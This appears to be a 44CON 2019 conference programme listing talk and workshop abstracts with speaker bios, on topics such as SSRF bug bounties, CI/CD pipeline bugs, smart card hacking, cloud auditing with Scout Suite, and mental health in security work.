With how many apps are running in the cloud, hacking these instances becomes easier with a simple vulnerability due to unsanitized user input. In this talk, we’ll discuss a number of different methods that helped us exfil data from different applications using Server-Side Request Forgery (SSRF). Using these methods, we were able to hack some of the major transportation, hospitality, and social media companies and make $50,000 in rewards in 3 months.

Cody Brocious

Cody Brocious is a security researcher and educator with over 15 years of experience in the field. While best known for his work in compromising hotel locks, Cody has worked on security for countless companies and products and has directed that expertise into Hacker 101.

CI/CD pipelines are the perfect, bug-rich target for new and experienced bug hunters. As complex, user-controlled automated processes with access to authentication secrets, source code, and application servers in multi-system, multi-user environments, they combine all the things that make bugs likely. In the presentation, I will outline a methodology for hunting for bugs in CI/CD pipelines and walk through actual bugs which have resulted in tens of thousands of dollars in bounty payments.

Alex Chapman

Alex Chapman is a full-time Bug Hunter primarily focused on vulnerability discovery, protocol analysis, and reverse engineering. Having spent over a decade of his life as a red teamer and penetration tester he jumped headfirst into the Bug Bounty industry spending time as a program advisor, platform technical advisor and now bug hunter. He has been credited in security advisories for a number of major software products for vendors such as Citrix, Google, Mozilla, and VMware, and has presented his research at security conferences around the world. He generally spends his time making things, poking holes in complex systems, and pointing out security flaws which have no place in modern-day software.

Automating user interaction with Sheepl: Soup to Nuts

Sheepl is a tool designed to emulate user behaviour and has matured into a platform for supporting tradecraft development for both red and blue teams. The tool was born out of a personal need for ‘sparring’ partners without the predictability of knowing when things are going to happen.

Using a representative network I plan to give participants hands on experience of creating Sheepl that can be used to attack, execute commands and emulate real world user actions such as browsing, opening emails, interacting with command environments and creating content.

The environment will also have a monitoring solution deployed that can be used to trace commands that will be executed from the ATT&CK framework. The workshop will also cover creating Sheepl that respond to events on a system and the example used will be to create Sheepl that watch for supplied process names and kill these automatically after a period of time. This is good for operational security considerations when looking at Red Team tradecraft development and for CTF style events.

I will also show the process of creating custom tasks to extend Sheepl capabilities and how sequences of tasks can be saved as JSON profiles. The goal is that by the end of the workshop, participants will have a solid understanding of the planning and workflow for creating Sheepl that support specific learning objectives as well as generating more realistic end user behaviour within training environments.

Matt Lorentzen

Matt has 20 years IT industry experience working within government, military, finance, education and commercial sectors. He is a senior security consultant and penetration tester at SpiderLabs with a focus on red team engagements.

Before joining SpiderLabs, he worked with Hewlett Packard Enterprise as a CHECK Team Leader delivering penetration testing services to a global client list. Prior to HPE, Matt ran his own IT consultancy company for 7 years.

Breaking Badge: A 101 Crash Course Smart Card Hacking Workshop

Because Steve’s lab imploded earlier this year (unrelated to any ongoing particle physics experiments), we’re using a smart card based badge based on the unhackable* SLE4442 smart card. There’s a competition to win an Atari Portfolio palmtop computer, the same model as seen in Terminator 2. To win, you need to develop the best solution that:

Relies upon the SLE4442 smart card for some form of security-related functionality.

Is not weakened by the use of the SLE4442 smart card.

Tim and Phyushin are running a workshop on the card, how to read from it, write to it and do things with it. You’ll learn the basics of smart card hacking, how to use and abuse APDUs and a little on the wonderful dissonance between the term “access control” and the act of controlling access effectively.

We’ll have Omnikey 3021 readers for you to play with, which need to be returned to the locksport area after the workshop so people can use them to take part in the competition.

*At least BitFi grade levels of unhackable.

Tim Wilkes and Phyushin

Tim is a failed electronics engineer who ended up being a sysadmin, which then landed him in security. Tim enjoys lockpicking, cold brew, HID attacks and smart card hacking.

Phyushin is a puppet duck which appeared on the CBBC interstitial programme The Broom Cupboard alongside presenters Andy Crane and Andi Peters. Since leaving the BBC, he’s been heavily involved in Leigh Hackspace, and would one day like to learn to code.

Here be dragons… the AWS S3 logging minefields

Cloud based services have become the norm. Your services are in the cloud, your data is in the cloud, your logs are in the cloud. What are the new challenges and concerns with this approach?

In this talk, SpectX will share its data-driven research into the reliability and trustworthiness of S3 server access logs. How does S3 server access logging work? How does Amazon’s best-effort log delivery look like in practice? When and how should you analyse the logs? What should you ask? Can you trust the results? If not – what’s the workaround?

Kieren Nicolas Lovell

Kieren Nicolas Lovell is a security expert from the University of Cambridge (King’s and Pembroke College), Tallinn University of Technology, and SpectX, a log analysis tool. He is also the incident response instructor at the Defence Academy of the UK. Previously, he has been the Head of CamCERT, the CISO at Standing NATO Maritime Group One, which was deployed for nine months in mitigating the pirate threat.

From fuzzing to free reign – Finding zero days with Tenable Research

Over the last 18 months Tenable Research have been hitting the headlines with major vulnerabilities they’ve discovered in household names and critical devices. Some read like a Hollywood script, enabling an attacker to break into an office undetected, others highlighting huge flaws in critical infrastructure. Join Leslie Forbes from Tenable, as he explores the more notable disclosures, how they were found and the impact they have to us all.

Leslie Forbes

Leslie Forbes is a Product Specialist for Tenable, engaging with medium and large businesses to understand their requirements for vulnerability management programs and to advise on their deployment strategies. His electronic engineering background and system administration credentials help him quickly grasp the unique challenges in each enterprise. He understands how good security can work with existing processes in all types of organizations. Prior to joining Tenable, Leslie worked for two large multinational anti-virus vendors.

Scout Suite – A Multi-Cloud Security Auditing Tool

Scout Suite (https://github.com/nccgroup/ScoutSuite) is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments. Using the APIs exposed by cloud providers, Scout Suite gathers configuration data for manual inspection and highlights risk areas. Rather than going through dozens of pages on the web consoles, Scout Suite presents a clear view of the attack surface automatically.
The following cloud providers are currently supported:

Amazon Web Services

Microsoft Azure

Google Cloud Platform

Oracle Cloud Infrastructure

Alibaba Cloud

During the presentation, we will run Scout Suite against a number of cloud environments preconfigured with typical flaws. We will display how Scout Suite can be used to identify and help with remediation of security misconfigurations.

Xavier Garceau-Aranda

Xavier is a senior security consultant at NCC Group, with experience in both academia and the private sector. He has worked as a developer and security consultant, focusing on application security. Xavier currently spends most of his time focusing on cloud security, as well as driving the development of Scout Suite, an open source multi-cloud security-auditing tool.

44CON 2019 Mental Health Village

The Mental Health Village has a ton of events to help with wellbeing for those working in the industry. These talks are scheduled to take place in the Mental Health Village.

Engineering resilience in the Fleshy Orchestration Layer

The Fleshy Orchestration Layer is a vital component in our cyber security and resilience tool chest, characterised by heuristic learning, an ability to operate in unconventional environments (humid, caffeinated, full of cheese) and a susceptibility to catastrophic issues when subjected to sustained load. Industry trends suggest that these failure modes are increasing in severity and occurrence.

The Fleshy Orchestration Layer operates our tools and implements our processes. It is prudent (and ethical) to treat instances within Fleshy Orchestration Layer as pets, not cattle, and for organisations and teams to invest effort in structures and processes that can support these instances

If you hadn’t figured it out by now, the Fleshy Orchestration Layer is you.

We invest huge sums into cybersecurity tooling. We crib from international governance frameworks when building our processes. We struggle to hire rare talent from a shallow pool, put them in front of a raging bin fire and watch them fall over.

Our roles have an adversarial and reactive, high-pressure nature that’s at high risk of breaking people down and exacerbating existing conditions. I’ll be using my own experiences within mental health and cybersecurity, as well as my time as a Search and Rescue medic, EPO and Ambulance Responder to frame the risks we face. I’ll then suggest practical steps that teams and organisations can take to protect cybersecurity personnel in the face our modem mental health crisis.

Tom Owen

Tom is a classic corporate security wonk, currently working as Head of Security for a Cloud company in the UK, building and managing security teams and things. Previously he did Security Stuff as a consultant and spent time doing Security Stuff in e-commerce, development and hosting. He is definitely not an industry rock-star but has completed his 10,000 hours. He spends a lot of time thinking about scary outcomes and how to mitigate them, and how to best protect and support the people he works with.

Tom was also, until recently, Emergency Planning Officer and a medic for one of the busiest Search and Rescue units in the UK (the identity of which will surprise you) and a first responder for the ambulance service.

Your Primer To Mental Health First Aid

In the Computer Security industry, just like other tech industries, it is paramount to look after ourselves and others – both physically and mentally. Understanding how you can support yourself and others when going through mental health experiences is just as important in both your personal and professional lives. From understanding mental health terminology to covering the basics of mental health first aid this workshop will set you off on the right track.

Outcome of The Workshop:

This guided workshop seeks to breakdown some key techniques that can be added to your Mental Health Awareness toolbox. We’ll go through each of these key areas, rising similarities between physical and mental health first aid. After each section we’ll break off into groups to further develop our understanding of the techniques.

What is mental health?

The spectrum of mental health.

What are frames of reference.

Making a stress container.

The principles of first aid.

Tips for signposting.

James Stevenson

James Stevenson is a software engineer and security researcher, with a history of security operations. James is also a qualified Physical and Mental Health First Aider, and in the past has worked alongside the British Red Cross in Event First Aid.